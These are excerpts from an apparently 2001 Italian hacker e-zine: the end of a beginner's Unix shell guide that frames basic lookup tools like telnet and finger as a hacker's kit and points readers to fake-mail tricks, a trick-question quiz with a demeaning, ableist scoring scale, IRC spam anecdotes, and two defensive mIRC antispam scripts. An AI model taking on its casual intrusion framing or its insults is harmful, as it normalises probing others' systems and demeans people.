Questa shell pero non è il massimo ma per un hacker alle prime armi va bene anzi benissimo...
Poi piu il la' quando sarete un po piu esperti sceglierete una shell migliore o anzi
potete addirittura crearvela da voi.
3° PARTE
Cosa è una shell?
è una cosa complicata da spiegare ma io ci provero' lo stesso in modo da farvi
assimilare esattamente cosa sia .La shell e' quell'interfaccia, quella che al posto
del solito prompt di MS-DOS o Windows tipo
C:\>_
ci mostra un prompt del tipo
%
oppure
$
oppure
#
Usare una shell è come usare il sistema UNIX e quindi potete eseguire molti comandi
tipici di questo sistema.Avere una shell è fondamentale per chi vuole essere
considerato un hacker e per chi ha voglia di imparare.
4° PARTE
Ecco qui "ten Meinel Hall of Fame LAN and Internet Exploration Tools" by Carolyn P. Meinel,
ovvero 10 comandi "that you absolutely must have access to":
1) telnet <host name> <port number>
fondamentale, se non puoi telnettarti con nessun sistema, "you are totally crippled as
a hacker" e quindi cercati all'istante un'altra shell
2) who
mostra quali altri utenti sono connessi
3) netstat
mostra statistiche come per esempio la lista delle connessioni del
server ad internet
4) whois <hostname>
per avere informazioni su un sito internet
5) nslookup
altre info, cosi' come il prossimo comando
6) dig
7) finger
vedi l'altro articolo per l'e-zine :-)
8) ping
per vedere se un sito e' attivo e come e' la connessione a
quell'host (lenta, veloce... ecc)
9) traceroute
traccia il percorso dei vari pacchetti spediti ad un certo host
10) ftp
per eseguire download e upload di files su altri computer.
Ora sta a voi giudicare la shell che avete appena trovato, se e' utile oppure da scartare.
5° PARTE
Ok, allora vediamo un po' come funziona la piu' famose delle varie shell che
sono in giro, ovvero la shell Grex, che trovate all'indirizzo
Cyberspace.org:23
Allora, per prima cosa vi trovate di fronte al saluto della macchina, e alla
richiesta di login.
Dato che non vi siete mai collegati (o se l'avete fatto, rifatelo, cosi' almeno
leggete anche questa parte dell'articolo eheheheh..) vi viene chiesto di digitare come:
full name:
address:
telephone number:
occupation:
computer equipment:
born:
sex:
interest:
comments:
Naturale che non siete obbligati a scrivere i vostri dati giusti giusti.
Infine chiede se volete rendere pubblici i vostri dati oppure no.Segue la
scelta della shell, nel senso dell'interprete dei comandi, la cosa piu' importante,
perche' se scegliete una shell di cui non sapete i comandi... be''...dovrete cambiarla.
L'ultimo passo: la scelta della login e della pass, e poi siete a posto, avete la
vostra shell, ripeto, che va benissimo per i vostri primi esperimenti di
newbie (e lo siete, altrimenti avreste saltato a pie' pari quest'articolo eheheh!)
ma che poi dovrete abbandonare per rimpiazzarla con la vostra shell di fiducia che
vi permette i servizi citati nella parte 4ø.
6° PARTE
Be'... sono logicamente comandi UNIX, quindi:
-cd <nome dir> per muoversi nel file system
-ls come il comando "dir" per dos
-cp <file1> <file2> come il comando "copy" per dos
-rm <nome file> come il comando "del" per dos
-mv <file1> <file2> come il comando "move" per dos
-mkdir <nome dir> come il comando "md" per dos
-rmdir <nome dir> come il comando "rd" per dos
-man <comando> fornisce info su quel comando
-more <file> visualizza il file
Questi sono solo i comandi basilari per muoversi.
Per ora è tutto ma se volete maggiori informazioni riguardo a telnet e i vari
giochetti che si possono fare con esso, come per esempio mandare FAKEMAIL
andate a dare un occhiata agli articoli del mio amico A[v]a[t]A[r] o sYn che vi giuro
sono davvero ben fatti....
Questi articoli potete trovarli nell 1° , nel 2° e nel 3° e anche in questo numero della
rivista dirtynet,...
Potete trovarla sul sito www.hackersat.com ........
Se avete dubbi, incertezze ed altro potete scrivermi al seguente indirizzo di posta
elettronica: jrash@hackersat.com
Un grosso bacione per la mia amata Giada e per tutte le ragazze della 3c del severi
di salerno! ByEzZ.........................lol...................lol.....
22/03/2001
======H@=========H@=========H@========H@========H@=========H@=========H@=========[Jrash]°
/===========================::=============================::=================/
/ /Test d'intelligenza! / sYn /
/===========================::=============================::=================/
Contate quante risposte date esatte.
IMPORTANTE: riflettete bene sulle domande.
1)Punto la sveglia alle ore 9:00 e vado a dormire alle 8:00.Quante ore dormo?
-1
2)Entri in una stanza buia con un fiammifero in mano. Trovi una lampada a gas, una a
petrolio ed una candela. Cosa accendi per prima?
-Il fiammifero
3)Dividi 30 x 2 e aggiungi 10.
-25
4)Un contadino ha 15 mucche.Muoino tutte tranne 9. Quante mucche sono vive?
-9
5) Il dottore ti ordina una cura veloce. 3 pastiglie da prendere in ogni mezz'ora,
quante ore dura la cura ?
-1
6)In Russia un uomo puo' sparare alla sorella della sua vedova ?
-No
7)Quanti mesi hanno 28 giorni?
-Tutti
8)Il 25 Aprile c'è anche in Inghilterra ?
-Si
9)Perchè alcuni italiani portano le bretelle rosse, bianche e verdi?
-Per mantenersi i pantaloni
10)Cosa è successo il 25 Dicembre 1989?
-Il Natale
11)Quanti animali porto' Mosè sull'Arca ?
-Era Noè...
12)Un metronotte muore di giorno, gli danno la pensione ?
-No, è morto
13)Cade un aereo dalla Germania con 20 tedeschi a bordo, dove vengono seppelliti i superstiti?
-Se sono superstiti...
14)La mamma di Pierino ha tre figli :Quo' Qui' e ...?
-Pierino
15)Quante dita ha una mano? Due mani? 10 mani?
-5
-10
-50
16)Inuna vasca ci sono 10 pesci, ne annegano 5, quanti ne rimangono?
-Non annegano
17)Quante gambe ha un'elefante? Se ne alza una?
-4
-4
18)Un palazzo ha 12 piani ,ogni piano ha il nome di un mese, come si chiama l'ascensore ?
-Col pulsante
19)Se 5 ragazzi mangiano 5 gelati in 5 minuti, in quanto tempo 50 ragazzi mangeranno 50 gelati?
- minuti
FINE
GRADI OTTENUTI
Su quante risposte errate.
1=superdotato
2=dotato
3=molto intelligente
4=intelligente
5=normale
6=quasi normale
7=stupido
8=molto stupido
9=idiota
10=molto idiota
11=tarato
12=cervello di gallina
13=senza possibilità di recupero
14=parassita della società
15=hanticappato
16=clinicamente morto
17=impossibile la convivenza
18=caso clinico perso
--=sYn=--=syn@hackersat.com=--www.hackersat.com=--
/===========================::=============================::=================/
/ /L'approccio in rete e more... / sYn /
/===========================::=============================::=================/
Salve ragazzi e ragazze!Preso un impegno io tendo sempre a mantenerlo.(chiedetelo a
chi mi conosce meglio,anzi NO non glielo chiedete!)
Comunque sia, adesso mi appresto ad illustrarvi un po' come funzione l'approccio
in rete; non solo con i sessi opposti. Sono stato meno approfondito ma decente
a descrivere i comportamenti. Dato che voglio far divertire un po' Smav' passo
subito alle caxxate vere e proprie:
(usando un mIRC client)
Entro in un canale della mia città o altri, ed ecco cosa mi succede :
Innanzitutto mi trovi in su' migliaia di query aperte che mi fanno porre un
interrogativo : Che cazzo è????
Start of eresha buffer: Thu Mar 29 18:51:47 2001
<eresha> http://gina21.xorg2000.com
<ssYYnn> xchè ?
-> [eresha] PING
<ssYYnn> xchè dovrei andare in questo sito?
<ssYYnn> Stai facendo solo pubblicità ?
<ssYYnn> sono troppo noioso ?
End of eresha buffer Thu Mar 29 18:51:47 2001
Naturalmente la chat è un ottimo posto per fare pubblicità al proprio sito. Molti
sfruttano di tutto per tempestare con pubblicità gli utenti e metterli a
conoscenza dei propri siti o altri...questo purtroppo è una cosa un po'
rompiballe (avanti si porra' meglio il problema)
Il bello e che non ti rispondono. Cio' dico se my query devi anche sopportare
la mia risposta..maro' mi fanno talmente incaxxare; un giorna di questi li
devo flodda' a uno a uno e li devo rienpire di brutte parole.
Vabbè questo non è niente osseravate adesso.
Start of Stefaniet buffer: Thu Mar 29 18:42:11 2001
<Stefaniet> Ciaooo ho appena messo delle nuove foto sul mio sito, corri a
vederle http://www.stefania.allow.it ( 0,4 ® PÎZzÄ §©rÎpT©1,0 (13Auto Messaggio)
)
End of Stefaniet buffer Thu Mar 29 18:42:11 2001
Bello il nome peccato che quella delle foto non sei tu. Altrimenti ti sarei venuto
a prendere a casa!!
Poi.
Start of P|4tin3t buffer: Thu Mar 29 18:42:29 2001
<P|4tin3t> www.sessopornohard.com - COME PROMESSO PRONTI GIA' SUL SITO, SIA DA
SCARICARE CHE DA VEDERE DIRETTAMENTE,!! 10 FILMINI HARD!!, E NUOVISSIME
IMMAGINI. www.sessopornohard.com - DIMENTICAVO DAL PRIMO APRILE NUOVO
SERVIZIO CON WEBCAM DAL VIVO CON CUI CHATTARE ( 0,4 ® PÎZzÄ §©rÎpT©1,0 (13Auto
Messaggio) )
End of P|4tin3t buffer Thu Mar 29 18:42:29 2001
Mettiamo caso che non ero io ma un bambimo ad avere questa query(tanto si sa' anche
i ragazzini chattano) cosa avrebbe fatto?UUU che bello i filmini, che belle le
immaginine, la webcamma bellissimo ci voglio andare mamma mamma....
.
Start of alessia78 buffer: Thu Mar 29 18:43:27 2001
<alessia78> Ciao, scusa il disturbo...volevo segnalarti un sito dove puoi
mandare infiniti SMS a tutti i GSM del mondo GRATUITAMENTE!!
www.elbaisola.com se non sei interessato...scusami! ( 0,4 ® PÎZzÄ §©rÎpT©1,0
(13Auto Messaggio) )
End of alessia78 buffer Thu Mar 29 18:43:27 2001
Bello il nick...gia' mi aaspettavo qualcosa di sensuali alla "cliccami per godere"
oppure www.hardhardxxx.comitnet il sito dove puoi trovare di tutto!Invece mi si
presenta un bel messaggio automatico con tanti di scuse! Complimenti volevo
quasi contattare l'autorema poi...ci ho ripensato.Cmq alessia78 ti voglio
beneeeeeee. Scusate.
.
Start of Fuoco73 buffer: Thu Mar 29 18:40:04 2001
<Fuoco73> programmi gratis e tanto altro su www.xxxxxxxxservice.com ( 0,4 ® PÎZzÄ
§©rÎpT©1,0 (13Auto Messaggio) )
End of Fuoco73 buffer Thu Mar 29 18:40:04 2001
Vaffanbip tu e i tuoi programmi...Cmq se lo sapete molti usano nomi femminili
per attirare(ma questo era risaputo).A questi tipi potete fare gli scherzetti
che fanno i lamerucci come ava !!
Sentite questa, è la dimostrazione che IRC a volte da' in testa !
Session Start: Thu Mar 29 18:44:42 2001
18:44:42 <Guest61533> ma de cheeeeeeeeeeeeeeeee
18:44:51 <ssYYnn> ?
-=> Nick: Guest61533 id: misterixe Host: ****.dialup.tiscalinet.it Full name: mister
-=> on chanz: #sesso #roma
-=> using server: twisted.ma.us.dal.net Global NAPs - Quincy, MA
18:45:05 <Guest61533> niente ciao
18:45:20 <ssYYnn> :|
Session Close: Thu Mar 29 18:52:13 2001
Questo tizio, mentre io sto tanto bello zitto e muto in rete mi chiama per
dirmi :"ma de cheeeeeeeeeeeeeeeee" !!MA allora si scem...è vero dovrebbero mettere
dei medici on line; ce ne è proprio la necessità (a volte mi farebbe comodo anche a me!)
Vedete questa.
Start of Yvano buffer: Thu Mar 29 18:44:31 2001
<Yvano> Ciao sono m ti posso fare una domanda?? 12 4°Tíþëttª S©®íþt° (4Messaggio
Automatico)
<ssYYnn> si
-> [Yvano] PING
<ssYYnn> ma....
<ssYYnn> che cazzo metti sto messaggio se poi non rispondi......
<ssYYnn> fXXK
End of Yvano buffer Thu Mar 29 18:44:31 2001
Il tizio con un messaggio dice se poteva pormi una domanda e io EDUCATAMENTE dico
di sì. Ma dato che dall'altra parte il tizio è sordo (non vedente!) lo rispondo
meno educatamente di prima...dopo un po' mi trovo con la scritta:
-Yvano- m'hai rotto er kazzo! [-Ignorato-] °Tíþëttª S©®íþt°
Pfff. sono cose da pazzi...
Bene bene,adesso inizia il dialogo(chiamatelo anche dialogo!!!) :
arriva un tizio con un nome un po' da frescone.
Session Start: Mon Mar 26 22:41:54 2001
22:41:54 <fresco17> ciao
22:42:46 <ssYYnn> ciao
22:42:47 <ssYYnn> sono m
22:42:55 <fresco17> addio allora
Session Close: Mon Mar 26 22:42:59 2001
(io ormai ho imparato MOLTO bene la lezione, quindi appena vedo un nome maschile che mi
saluta io non faccio altro che dirgli :Ciao,sono m.Fino ad ora questo metodo ha
funzionato benissimo, ve lo consiglio !:)
Cosa è successo allora ? Mica ho detto che sono un drogato?Un pedofilo?Un
ninfomane?Un arrapato mentale?Ho detto semplicemento che sono di sesso maschile.
E lui addirittura mi rispobde così:"<fresco17> addio allora" !!!Cavolo a me fa
piacere che non ci sentiremo +, pero' un po di educazione non guasta.
adesso ci proco io.
Session Start: Tue Mar 27 20:16:49 2001
20:16:50 <ssYYnn> ciao
Session Close: Tue Mar 27 20:25:25 2001
MMM nessuna risposta, strano lo ho anche pingata, ho un brutto nickname? Impossibile
ho visto gente con dei nick SPAVENTOSI e RIVOLTANTI avere le migliori discussioni in
rete!!
Riproviamo, il nick mi convince.
Session Start: Tue Mar 27 20:16:39 2001
20:16:42 <ssYYnn> ciao ofelia
20:17:20 <ofelia83> ciao
20:17:31 <ssYYnn> sei di salerno ?
20:22:30 <ssYYnn> ci 6 ?
20:22:40 <ssYYnn> ho sbagliato domanda ?
20:22:42 CTCP: PING To: ofelia83
Session Close: Tue Mar 27 20:25:23 2001
Ma che cavolo è ma sono tanto antipatico, un normale ragazzo ditemi allora come puo'
iniziare un normale dialogo con una ragazza della propria città...poi dicono tramite
la chat si puo' arrivare al matrimonio..seeee..il matrimonio puo' avvenire ma sarà
tra due anomali di mente! Sfrutto l'occasione per dirvi che ho avuto solo con una
ragazza dela mia città una lunga discussione, con tanto di scambio numeri,che oserei
dire bellissima...ma questo a mio resoconto è solo un caso raro.
continuiamo.Adesso è un tizio che mi contatta.
Session Start: Mon Mar 26 22:31:18 2001
Session Ident: Guest54347 (aaa@sa1-753.dialup.tiscalinet.it)
22:31:18 <Guest54347> ciao anni da dove dgt????
22:31:27 <ssYYnn> sono m
22:31:41 <ssYYnn> ti interesso ?
22:31:59 <Guest54347> addiiiiioooooooooooooo!!!!!!!!!!!!!!!!!!!!!
22:32:08 <ssYYnn> grazie
22:32:18 <Guest54347> prego
Session Close: Mon Mar 26 22:33:04 2001
Questa volta all'addio lo ho risposto, anche se molto semplicemente.Proprio non c'è
un metodo per scampare ad una query e agli auto messaggi,anzi per gli automessaggio
degli insulsi script vi farebbe molto comodo azionare un'antispam; magari settando
le parole chiavi tipo :
auto
Benvenuto
Crackrock
DDD-YYY-NNN-AAA-MMM-III-RRR-CCC
http
JudoX
M3n0k4
Mâgïç
PÎZzÄ
script
S[R|pT
S¢riþT
SçRÎpT
Venom
Welcome
www
ynamirc
§©®îpt
ÐÏÊ
ëgátiñØ
Simpson
Ultimamente questo add-on si trova su svariati script.Ma dato che io sono molto "un
bravo ragazzo" ve li inserisco here :
questo è l'antispam n°1
_____________________________________________________________________________________
ANTISPAM N°1
leggimi.txt
--www.hackersat.com-- leggimi.txt
To install this addon type
/load -rs antispam\installa.ini
Per installare questa addon scrivi
/load -rs antispam\installa.ini
Please no rip this script
Non rippare questo questo script
Bye
spam.txt
dialog ms-antispam {
title "hackersat ANTISPAM"
size -1 -1 230 225
box "Scritto da Lains", 49, 5 5 220 180
text "ON", 1, 110 25 70 15
text "OF", 2, 158 25 70 15
text "Sex-Url", 3, 40 50 60 15
text "M o F?", 4, 40 70 60 15
text "CyberSex-Prot", 5, 40 90 70 15
text "Inviti", 6, 40 110 70 15
text "Spam-Script", 7, 40 130 70 15
text "Insulti", 8, 40 150 70 15
radio "", 12, 110 53 20 10, right group
radio "", 13, 158 53 20 10, right
radio "", 14, 110 73 20 10, right group
radio "", 15, 158 73 20 10, right
radio "", 16, 110 93 20 10, right group
radio "", 17, 158 93 20 10, right
radio "", 18, 110 113 20 10, right group
radio "", 19, 158 113 20 10, right
radio "", 20, 110 133 20 10, right group
radio "", 21, 158 133 20 10, right
radio "", 22, 110 153 20 10, right group
radio "", 23, 158 153 20 10, right
button "Chiudi Il Dialog", 24, 20 190 200 25, ok default
}
on 1:dialog:ms-antispam:sclick:*: {
if ($did == 12) { enable #Protezionesesso | echo 3 Protezione SeX URL ON }
if ($did == 13) { disable #Protezionesesso | echo 3 Protezione SeX URL OFF }
if ($did == 14) { enable #mof | echo 3 M o F on }
if ($did == 15) { disable #mof | echo 3 M o F off }
if ($did == 16) { enable #cybersexprot | echo 3 Protezione C-sex ON }
if ($did == 17) { disable #cybersexprot | echo 3 Protezione C-SEX OFF }
if ($did == 18) { enable #invitiprot | echo 3 Protezione inviti ON }
if ($did == 19) { disable #invitiprot | echo 3 Protezione inviti OFF }
if ($did == 20) { enable #scriptitaliani | echo 3 Protezione Spam Script ON }
if ($did == 21) { disable #scriptitaliani | echo 3 Protezione Spam Script OFF }
if ($did == 22) { enable #insulti-prot | echo 3 Protezione Insulti-Prot ON }
if ($did == 23) { disable #insulti-prot | echo 3 Protezione Insulti-Prot OFF }
}
menu menubar {
M-S Prot Query:/dialog -m ms-antispam ms-antispam
frasi.txt
#Protezionesesso off
on 1:text:*www*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No URL per favore!! | /echo -a 4Ignorerai $nick per 30 Sec. 4No sex-url!! Prot
on 1:text:*http*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No URL per favore!! | /echo -a 4Ignorerai $nick per 30 Sec. 4No sex-url!! Prot
on 1:text:*XXX*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No URL per favore!! | /echo -a 4Ignorerai $nick per 30 Sec. 4No sex-url!! Prot
#Protezionesesso end
#cybersexprot off
on 1:text:*donna*per*cybersex*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Cybersex!! | /echo -a 4Ignorerai $nick per 30 Sec. 4No Cybersex!! Prot
on 1:text:*cerco*donna*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Cybersex!! | /echo -a 4Ignorerai $nick per 30 Sec. 4No Cybersex!! Prot
on 1:text:*sei*lurida*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Cybersex!! | /echo -a 4Ignorerai $nick per 30 Sec. 4No Cybersex!! Prot
on 1:text:*donna*disinibita*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Cybersex!! | /echo -a 4Ignorerai $nick per 30 Sec. 4No Cybersex!! Prot
on 1:text:*cerco*donna*per*sesso*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Cybersex!! | /echo -a 4Ignorerai $nick per 30 Sec. 4No Cybersex!! Prot
on 1:text:*sei*porca*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Cybersex!! | /echo -a 4Ignorerai $nick per 30 Sec. 4No Cybersex!! Prot
#cybersexprot end
#mof off
on 1:text:*M*o*F*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No M o F!! | /echo -a 4Ignorerai $nick per 30 Sec. 4No M o F!! Prot
#mof end
#invitiprot off
on 1:text:*tutti*su*#*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Inviti!! | /echo -a 4Ignorerai $nick per 30 Sec. Inviti-Prot
on 1:text:*ti*aspetto*su*#*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Inviti!! | /echo -a 4Ignorerai $nick per 30 Sec. Inviti-Prot
on 1:text:*join*#*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Inviti!! | /echo -a 4Ignorerai $nick per 30 Sec. Inviti-Prot
on 1:text:*e'*nato*#*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Inviti!! | /echo -a 4Ignorerai $nick per 30 Sec. Inviti-Prot
on 1:text:*ndate*su*#*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Inviti!! | /echo -a 4Ignorerai $nick per 30 Sec. Inviti-Prot
on 1:text:*vieni*su*#*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Inviti!! | /echo -a 4Ignorerai $nick per 30 Sec. Inviti-Prot
on 1:text:*entate*su*#*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Inviti!! | /echo -a 4Ignorerai $nick per 30 Sec. Inviti-Prot
on 1:text:*ti*aspettiamo*su*#*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Inviti!! | /echo -a 4Ignorerai $nick per 30 Sec. Inviti-Prot
on 1:text:*#*il*canale*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Inviti!! | /echo -a 4Ignorerai $nick per 30 Sec. Inviti-Prot
#invitiprot end
#scriptitaliani off
on 1:text:*S©®íþt*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Spam Script!! | /echo -a 4Ignorerai $nick per 30 Sec. Spam-script-prot
on 1:text:*PÎZzÂ*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Spam Script!! | /echo -a 4Ignorerai $nick per 30 Sec. Spam-script-prot
on 1:text:*Auto*Messaggio*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Spam Script!! | /echo -a 4Ignorerai $nick per 30 Sec. Spam-script-prot
on 1:text:*Messaggio*Automatico*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Spam Script!! | /echo -a 4Ignorerai $nick per 30 Sec. Spam-script-prot
on 1:text:*Auto*Messa*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Spam Script!! | /echo -a 4Ignorerai $nick per 30 Sec. Spam-script-prot
on 1:text:*dynamirc*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Spam Script!! | /echo -a 4Ignorerai $nick per 30 Sec. Spam-script-prot
on 1:text:*hello.to*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Spam Script!! | /echo -a 4Ignorerai $nick per 30 Sec. Spam-script-prot
on 1:text:*move.to*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Spam Script!! | /echo -a 4Ignorerai $nick per 30 Sec. Spam-script-prot
on 1:text:*Dynamrc*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Spam Script!! | /echo -a 4Ignorerai $nick per 30 Sec.(MonDoScRiPT)
on 1:text:*Ðynamrc*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Spam Script!! | /echo -a 4Ignorerai $nick per 30 Sec.(MonDoScRiPT)
on 1:text:*4(512Dynamirc54)*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Spam Script!! | /echo -a 4Ignorerai $nick per 30 Sec.
#scriptitaliani end
#insulti-prot off
on @1:text:*puttan*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Volgarita'!! | /echo -a 4Ignorerai $nick per 30 Sec.4No Volgarita'!!
on @1:text:*troia*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Volgarita'!! | /echo -a 4Ignorerai $nick per 30 Sec.4No Volgarita'!!
on @1:text:*mignott*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Volgarita'!! | /echo -a 4Ignorerai $nick per 30 Sec.4No Volgarita'!!
on @1:text:*vaffancul*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Volgarita'!! | /echo -a 4Ignorerai $nick per 30 Sec.4No Volgarita'!!
on @1:text:*bastard*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Volgarita'!! | /echo -a 4Ignorerai $nick per 30 Sec.4No Volgarita'!!
on @1:text:*sborr*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Volgarita'!! | /echo -a 4Ignorerai $nick per 30 Sec.4No Volgarita'!!
on @1:text:*porcodi*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Volgarita'!! | /echo -a 4Ignorerai $nick per 30 Sec.4No Volgarita'!!
on @1:text:*fotti*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Volgarita'!! | /echo -a 4Ignorerai $nick per 30 Sec.4No Volgarita'!!
on @1:text:*pompin*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Volgarita'!! | /echo -a 4Ignorerai $nick per 30 Sec.4No Volgarita'!!
on @1:text:*sgualdrin*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Volgarita'!! | /echo -a 4Ignorerai $nick per 30 Sec.4No Volgarita'!!
on @1:text:dio por*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Volgarita'!! | /echo -a 4Ignorerai $nick per 30 Sec.4No Volgarita'!!
on @1:text:dio ca*:?:/close -m $nick | /ignore -u30 $nick | /msg $nick 4No Volgarita'!! | /echo -a 4Ignorerai $nick per 30 Sec.4No Volgarita'!!
#insulti-prot end
installa.ini
[script]
n0=;Antispam install
n1=on 1:load: {
n2=load -rs antispam\frasi.txt
n3=load -rs antispam\spam.txt
n4=echo Antispam Caricato
n5=echo E' una fase beta e verra' aggiornata
n6=echo Consigli sono molto graditi. Hackersat.com
n7=unload -rs antispam\installa.ini
n8=}
_____________________________________________________________________________________
ed ecco il secondo
_____________________________________________________________________________________
ANTISPAM N°2
leggimi.txt
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=
ANTISPAM
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=
/load -rs antispam.ini per caricarlo. Funziona
con mIRC 5.6 o superiori.
inserisci il file sp.bmp nella directory di mirc.exe
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=
ANTISPAM
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=
sp.bmp
(inseritegli un'immagine qualunque come titolo,90 x 12,2 pixel)
antispam.ini
[script]
n0=; x.X.X.
n1=; xXxXXXX"
n2=; "XxXXK*`8b
n3=; "xXX'88888)
n4=; o `X''..""" o
n5=; 8)iiiiiIIIIIiiii(8
n6=; ' "iiIIII" ` Antispam hackersat.com
n7=; ]iIII[ script costruito leggendo le guide di helpdesk.
n8=; iiIIII
n9=; _."iiII"._
n10=; a888o a888o
n11=on 1:load: {
n12= echo -a $versione.antipspam
n13= echo -a AntiSpam v.2.0. funziona con mIRC 5.6 e superiori, tu ora stai usando il mIRC 4 $VERSION
n14= echo -a --new-- Fixato bug nell'edit box che non permetteva di inserire parole lunghe
n15= echo -a --new-- Tolto il remove ascii che creava solo casini aggiuntivi
n16= echo -a per bloccare uno spam o una url che ti arriva di frequente in query, inserisci la parola intera nell'edit e clikka su add.
n17= echo -a $versione.antipspam
n18= set %spam-parole messaggio,sesso,cybersex,Dynamirc,Ðynamirc,DYNAMRC,ScRipT³,Dynamrc'99,Dynamirc'99,Ðynamrc,°MËñòkª,NýTrÖ,menok,G|G4Byt3,§©rÎpT,ScRiPt,!Dynamirc!,porno,guadagnare,http://hello.to/dynamirc,4(512Ðynamirc54),http://dynamirc.cjb.net,http://dynamirc.tsx.org,4(512Ðynamirc'9954)
n19= set %status-antispam AntiSpam Spento
n20= set %spam-ignore 1
n21= set %spam-tempoignore 30
n22= set %spam-ignoremask 3
n23= set %spam.bloccati 0
n24=}
n25=dialog spam {
n26= title "spam Setup"
n27= size 50 100 445 230
n28= button "fine", 1, 321 120 100 40, ok
n29= edit "", 2, 220 80 200 18,center,autohs,autovs
n30= EDIT "", 3, 220 100 200 18,center,autohs,autovs
n31= edit "", 9, 1 22 210 20, left,autohs,autovs
n32= list 10, 1 45 210 120, extsel size
n33= button "Add", 11, 2 1 60 20, default
n34= button "Deleta", 12, 65 1 50 20, default
n35= check "Ignore?", 13, 240 1 86 20, right
n36= text "Per quanti Secondi?", 14, 240 22 121 20, left
n37= edit "", 15, 360 19 40 20, right,autohs,autovs
n38= text "Hostmask", 16, 240 48 158 20, left
n39= combo 17, 300 45 120 120, drop
n40= button "AttivaI", 18, 220 120 100 20, default
n41= button "Spegni",19 , 220 140 100 20, default
n42= icon 33, 10 150 400 100, sp.bmp
n43=}
n44=
n45=on *:DIALOG:spam:init:0: {
n46= did -a spam 3 Spam Bloccati: %spam.bloccati
n47= did -a spam 2 %status-antispam
n48= if (%spam-parole) { spam-parole }
n49= did -a spam 17 *!user@host.domain
n50= did -a spam 17 *!*user@host.domain
n51= did -a spam 17 *!*@host.domain
n52= did -a spam 17 *!*user@*.domain
n53= did -a spam 17 *!*@*.domain
n54= did -a spam 17 nick!user@host.domain
n55= did -a spam 17 nick!*user@host.domain
n56= did -a spam 17 nick!*@host.domain
n57= did -a spam 17 nick!*user@*.domain
n58= did -a spam 17 nick!*@*.domain
n59= if (%spam-tempoignore) {
n60= did -a spam 15 %spam-tempoignore
n61= }
n62= else {
n63= did -a spam 15 30
n64= }
n65= if (%spam-ignoremask) {
n66= did -c spam 17 %spam-ignoremask
n67= }
n68= else {
n69= did -c spam 17 1
n70= }
n71= if (%spam-ignore == $null) || (%spam-ignore == 0) {
n72= did -b spam 14
n73= did -b spam 15
n74= did -b spam 16
n75= did -b spam 17
n76= }
n77= else {
n78= did -c spam 13
n79= }
n80=}
n81=on *:DIALOG:spam:sclick:1:sbiliguda
n82=on *:DIALOG:spam:sclick:11:aggiungi.parola
n83=on *:DIALOG:spam:sclick:12:deleta.parola
n84=on *:DIALOG:spam:sclick:13:diddalo
n85=on *:DIALOG:spam:sclick:18:accendi
n86=on *:DIALOG:spam:sclick:19:spegni
n87=;============> Gruppi
n88=#spam on
n89=on !1:text:*:?: {
n90= %spam-ricerca-loop = 0
n91= :loop
n92= inc %spam-ricerca-loop
n93= %spam-ricerca-ok = $gettok(%spam-parole,%spam-ricerca-loop,44)
n94= %spam-ricerca-stringa = $remove($strip($1-),$chr(44))
n95= if (%spam-ricerca-ok) {
n96= if ($findtok(%spam-ricerca-stringa,%spam-ricerca-ok,0,*) > 0) || ($findtok(%spam-ricerca-stringa,%spam-ricerca-ok,0,32) > 0) {
n97= if (%spam-ignore == 1) {
n98= close -m $nick
n99= ignore -u [ $+ [ %spam-tempoignore ] ] $nick %spam-ignoremask
n100= inc %spam.bloccati
n101= msg $nick $versione.antipspam La Parola " $+ %spam-ricerca-ok $+ " e' nel mio Blocca-spam
n102= echo -a $bloccato " $+ %spam-ricerca-ok $+ "
n103= }
n104= else {
n105= inc %spam.bloccati
n106= msg $nick $versione.antipspam La Parola " $+ %spam-ricerca-ok $+ " e' nel mio Blocca-spam
n107= echo -a $bloccato " $+ %spam-ricerca-ok $+ "
n108= }
n109= }
n110= else { goto loop }
n111= }
n112= unset %spam-ricerca-*
n113=}
